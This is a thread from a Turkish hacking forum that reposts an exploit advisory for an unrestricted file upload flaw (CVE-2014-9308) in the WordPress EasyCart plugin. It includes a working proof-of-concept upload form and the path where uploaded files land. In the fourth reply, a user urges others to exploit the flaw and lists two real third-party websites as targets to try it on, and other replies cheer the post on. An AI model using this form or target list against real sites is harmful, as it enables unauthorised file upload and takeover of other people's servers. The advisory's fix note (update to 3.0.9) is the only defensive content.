Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 13:50
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps


1. Description

Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php

PHP Kod:
http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html 


2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

PHP Kod:
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <
input type="hidden" name="datemd5" value="1">
    <
input type="file" name="Filedata">
    <
input value="Upload!" type="submit">
</
form
File will be visible:
PHP Kod:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension% 

3. Solution:


Update to version 3.0.9
https://downloads.wordpress.org/plugin/w....3.0.9.zip


Alinti
D4V3TS1Z
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 4
Yaşam Puanı: 1 / 85
Deneyim: 40 / 100
Rep Sayısı: 2
Mesaj Sayısı: 32
Üyelik Tarihi: 03.01.2015
     
Yorum: #2
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 13:52
teşekkürler elinize sağlık Exciting
Alinti
kevin dark
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 21
Deneyim: 86 / 100
Rep Sayısı: 0
Mesaj Sayısı: 9
Üyelik Tarihi: 11.01.2015
     
Yorum: #3
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 16:19
güzell. eline sağlık
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 54 / 100
Rep Sayısı: 2722
Mesaj Sayısı: 6201
Üyelik Tarihi: 21.08.2013
     
Yorum: #4
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
12.01.2015 12:49
süper bir açık değerlendirilmesi gerekiyor eline sağlık kardeşim Smile
ama çok az site çıkıyor.
Denemek isteyene site =>
1 - herocatscomic.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
2 - supracompanies.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
(Bu konu en son: 12.01.2015 Tarihinde, Saat: 12:53 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.

cyberizm

Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #5
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
12.01.2015 13:16
Alışveriş Sitesi Bayılırım Exciting Exciting

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti



1 Ziyaretçi